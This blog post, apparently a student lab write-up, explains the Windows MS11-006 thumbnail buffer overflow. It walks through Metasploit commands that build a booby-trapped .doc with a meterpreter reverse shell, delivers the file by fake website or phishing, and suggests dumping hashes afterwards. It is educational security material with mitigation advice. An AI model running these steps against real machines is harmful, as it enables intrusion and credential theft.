Exploiting Windows XP with the thumbnail image of a file

By Connor McLaughlin

Intro:

Windows XP and earlier versions of windows are very well known in the offensive security world of being rife with security vulnerabilities. Including the Distributed Component Object Model (DCOM) Remote Procedure call exploit MS03_026, or the famous MS08_67 exploit that would allow remote code execution and even full control over the victim’s machine. I chose to learn about a lesser known and less popular exploit, MS11-006.

Background and details of vulnerability:

MS11-006 is a vulnerability that was first disclosed in mid-December of 2010, during POC 2010. POC is an international security and hacking conference in Korea. The vulnerability was disclosed by Moti and Xu Hao (1). The vulnerability takes advantage of a weakness in the code of the Windows Shell graphics processor. It causes a buffer overflow to occur in the CreateSizedDIBSECTION function inside the Windows dynamic link library file, shimgvw.dll (1). This overflow is caused when a specially crafted .MIC, .DOC, or another office file type is altered to where there is a negative value in the thumbnail bitmap “biClrUsed” variable. Just simply having this file on your machine will not cause any harm to your computer. To be able to exploit this vulnerability the user must go to the “view” tab on the file explorer window and select “Thumbnail view”. As soon as this happens it will trigger the buffer overflow and whatever code is embedded in that malicious file will execute. In most cases opening the computer up for remote control by the attacker. This exploit however does not guarantee admin access like many other more popular Windows XP exploits. It will only guarantee the same access level as the user who caused the remote code to execute. This means that if an admin is logged on and causes the remote code to executive you have admin rights, but if a regular user is logged on you will only have access to what they access to. This fact alone may push people away from using this exploit, as well as the effort involved in getting remote access to the system. But, what’s different about this exploit is that with it being somewhat unknown, blue teams & regular users will not be defending against it as much as the more popular exploits I mentioned above. Another plus to this exploit is that it is not exclusive to Windows XP. It affects Windows XP SP3, Windows XP Professional x64 SP2, Windows Vista SP1 and SP2, and many more Operating systems that can be found right on Microsoft website here (2). Not that it means too much but Microsoft even labels the vulnerability as a critical one.

Step by step guide:

Now that I’ve given some background information on the vulnerability and approximately how it works. I will give a short guide on how to perform the attack on your own. I performed this attack in a closed environment using the RIT labs, and some VM’s. The VM’s that I used specifically were Kali Linux, and a Windows XP SP3 VM. I used Kali because it will allow me to use the Metasploit framework which is by far the easiest and most efficient way to perform this exploit. I then used a Windows XP SP3 because it is one of the most common operating systems on the list of affected ones and is a familiar one for most people. I would also recommend doing this exploit on VM’s to prevent accidentally misusing the exploit as you should do with all exploits. I have included my very basic topology in Figure 1, for reference.

Figure 1: Simple topology for demonstration

  1. First you will need to have a Kali box with the Metasploit framework, and a Windows XP SP3 box connected locally or over a network. In my case I used VM’s on a NAT network.
  2. Open the Metasploit framework on your Kali box and once the terminal is loaded up enter the commands:

msf5 > use exploit/windows/fileformat/ms11_006_createsizeddibsection                                   msf5> set payload windows/meterpreter/reverse_tcp

Figure 2: Commands in Step 2

What we just did was select the exploit and set the payload. In this case we will be using a reverse_tcp connection, so that you can gain a remote shell in the victim’s machine. you will need to create a malicious file to cause the bufferoverflow. Name it something that will intrigue the user. I just used the name COOLSTUFF.doc, Enter the command:    

msf5 > set filename COOLSTUFF.doc

  • Now you will need to set where the file will be output on the attacker’s machine so it can be located, the localhost IP (Attackers IP) and the port of the attackers PC that the victim will connect to. enter the commands:                                                               

msf5 > set outputpath /root/Desktop                                                                           

msf5 > set lhost 10.1.1.1                                                                                               

msf5 > set lport 443

Figure 3: Commands listed in Steps 3,4

Now we need to setup a listener to manage the connection when the victim causes the exploit to execute. We will use the handler exploit and be using the same port and IP used in the last set of commands and issuing the exploit command to start executing. Issue these commands:           

msf5 > use exploit/multi/handler

msf5 > set payload windows/meterpreter/reverse_tcp                                                               msf5 > set lhost 10.1.1.1                                                                                                          

msf5 > set lport 443                                                                                                                      msf5 > exploit

Figure 4: Commands from Step 5

Now that the attacker is listening for the victim, we need to get the file onto the victim’s machine there are a few ways you can do this. You can setup a fake website and have the victim download the file. Or you can craft a very suspicious phishing email and send it to your victim. I used the fake website method to get the file onto the victim’s machine. To do this setup a webserver to host a basic website. I used apache and won’t go over how-to setup a basic website here, but once you have it setup edit the index.html in var/www/html to include a link to your malicious file. Once your website has as link to the file, go onto the victim’s machine and type in the attackers IP into the address bar in Internet explorer.  While on the website right click the link and click “save target as” and name it something with a .doc or some other office file extension and change the drop-down bar to all files.

Figure 5: example of simple website created, as viewed through a Linux VM.

Once the file is saved in a location go into that folder that is storing the file and change the view selection to “Thumbnail mode”. Once you do that you should see your Metasploit terminal activate and turn into a meterpereter session. You should now have access to the victim’s machine, and you can now start doing some damage. Such as dumping hashes, looking at hidden files, and using Metasploit to implement more exploits.

Mitigation:

In terms of mitigation for this vulnerability there isn’t many things that can be done to stop it. The main and easiest prevention method is to make sure that you’re that your computer is as up to date as possible and includes the security update KB2483185. This update was released specifically to address he critical vulnerability of MS11_006. This update was released on February 8th, 2011 (3). Which was nearly three months after the vulnerability was disclosed in December of 2010. Another way to mitigate the risk of this vulnerability is to simply not use any of the operating systems that are affected by it. This will be very easy for the single user, but for businesses running legacy hardware and systems it will be difficult to accomplish. Another way to mitigate the potential damage of this vulnerability is to not click on unsuspecting links or files downloaded from the web or from suspicious email sources, and especially do not open them in thumbnail mode.

Final Points:

Doing this project has made me realize a greater respect for those that manage to find these types of exploits and publish their research freely to help make the software better. Who knows how long this vulnerability was out in the wild before Moti and Xu Hao managed to find it a use it successfully? It is also fascinating how many different operating systems this affected, because when looking at the list on Microsoft website it effects almost a dozen. Another point to note about this vulnerability in particular is that it serves as an example to diversify the exploits that you know. Because, if you were in a competition or something and you needed to exploit an XP box and the blue team had already defended against the other exploits this gives you another tool to throw at them. However, it is a very hard exploit to use successfully in the real world. Because almost no one would randomly click on the thumbnail view in the file explorer, and this is sole action required to execute the arbitrary code. Overall, I enjoyed researching this vulnerability and, in the future, will likely investigate even lesser-known vulnerabilities to see how they work.

Resources Used:

(1) http://contagiodump.blogspot.com/2011/02/cve-2010-3970-doc-secretary-general.html

(2) https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-006

(3) https://www.manageengine.com/products/desktop-central/patch-management/Windows-XP-Professional-x64-Edition/WindowsServer2003.WindowsXP-SP2-KB2483185-x64-ENU.html(4) https://www.cvedetails.com/cve/CVE-2010-3970/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s